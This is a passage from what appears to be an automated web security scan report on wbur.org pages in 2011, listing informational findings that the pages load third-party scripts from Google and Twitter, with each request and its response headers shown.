Host:   http://www.wbur.org
Path:   /npr/141052309/authentic-egyptian-music-is-from-the-streets

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141052309/authentic-egyptian-music-is-from-the-streets HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:19 GMT
Connection: close
Content-Length: 55306


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.51. http://www.wbur.org/npr/141052852/even-in-lebanon-no-safe-haven-for-syrian-dissidents  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/141052852/even-in-lebanon-no-safe-haven-for-syrian-dissidents

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141052852/even-in-lebanon-no-safe-haven-for-syrian-dissidents HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:09 GMT
Connection: close
Content-Length: 51449


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.52. http://www.wbur.org/npr/141053373/thin-moms-and-dads-pass-on-skinny-genes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/141053373/thin-moms-and-dads-pass-on-skinny-genes

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141053373/thin-moms-and-dads-pass-on-skinny-genes HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:00 GMT
Connection: close
Content-Length: 48694


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.53. http://www.wbur.org/npr/141057189/my-smartphone-is-a-microscope-what-can-yours-do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/141057189/my-smartphone-is-a-microscope-what-can-yours-do

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141057189/my-smartphone-is-a-microscope-what-can-yours-do HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:12 GMT
Connection: close
Content-Length: 50205


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.54. http://www.wbur.org/npr/141062091/is-nostalgia-enough-to-save-friendlys  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/141062091/is-nostalgia-enough-to-save-friendlys

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141062091/is-nostalgia-enough-to-save-friendlys HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:08 GMT
Connection: close
Content-Length: 48571


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.55. http://www.wbur.org/npr/141071545/bible-belt-oktoberfest-finally-taps-a-beer-keg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/141071545/bible-belt-oktoberfest-finally-taps-a-beer-keg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141071545/bible-belt-oktoberfest-finally-taps-a-beer-keg HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:15 GMT
Connection: close
Content-Length: 44590


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.56. http://www.wbur.org/npr/141071652/clerk-inadvertently-helps-ga-woman-win-powerball  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/141071652/clerk-inadvertently-helps-ga-woman-win-powerball

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141071652/clerk-inadvertently-helps-ga-woman-win-powerball HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:14 GMT
Connection: close
Content-Length: 44818


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.57. http://www.wbur.org/npr/141071655/occupy-wall-street-college-students-urged-to-walk-out-today  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/141071655/occupy-wall-street-college-students-urged-to-walk-out-today

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141071655/occupy-wall-street-college-students-urged-to-walk-out-today HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:10 GMT
Connection: close
Content-Length: 48149


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.58. http://www.wbur.org/npr/141080655/afghan-officials-say-plot-to-kill-karzai-foiled  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/141080655/afghan-officials-say-plot-to-kill-karzai-foiled

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141080655/afghan-officials-say-plot-to-kill-karzai-foiled HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:58 GMT
Connection: close
Content-Length: 46081


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.59. http://www.wbur.org/npr/people/104192887/mark-memmott  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/people/104192887/mark-memmott

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/people/104192887/mark-memmott HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:06 GMT
Connection: close
Content-Length: 43231


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.60. http://www.wbur.org/npr/people/2100182/deborah-amos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/people/2100182/deborah-amos

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/people/2100182/deborah-amos HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:05 GMT
Connection: close
Content-Length: 43397


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.61. http://www.wbur.org/npr/people/2100422/frank-deford  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/people/2100422/frank-deford

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/people/2100422/frank-deford HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:03 GMT
Connection: close
Content-Length: 43423


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.62. http://www.wbur.org/npr/people/2101289/nina-totenberg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/people/2101289/nina-totenberg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/people/2101289/nina-totenberg HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:07 GMT
Connection: close
Content-Length: 43322


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.63. http://www.wbur.org/npr/people/3800445/tovia-smith  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/people/3800445/tovia-smith

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/people/3800445/tovia-smith HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:04 GMT
Connection: close
Content-Length: 42718


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.64. http://www.wbur.org/people  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /people

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:39 GMT
Connection: close
Content-Length: 75323


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.65. http://www.wbur.org/people/fred-thys  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /people/fred-thys

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/fred-thys HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:45 GMT
Connection: close
Content-Length: 41683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<link rel="canonical" href="http://www.wbur.org/people/fred-thys" />
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.66. http://www.wbur.org/programs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /programs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /programs HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:30 GMT
Connection: close
Content-Length: 51052


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.67. http://www.wbur.org/programs/atc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /programs/atc

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /programs/atc HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:34 GMT
Connection: close
Content-Length: 49343


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.68. http://www.wbur.org/programs/fresh-air  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /programs/fresh-air

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /programs/fresh-air HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:37 GMT
Connection: close
Content-Length: 51804


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.69. http://www.wbur.org/programs/morning-edition  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /programs/morning-edition

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /programs/morning-edition HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:32 GMT
Connection: close
Content-Length: 46229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.70. http://www.wbur.org/programs/schedule  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /programs/schedule

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /programs/schedule HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:35 GMT
Connection: close
Content-Length: 39409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

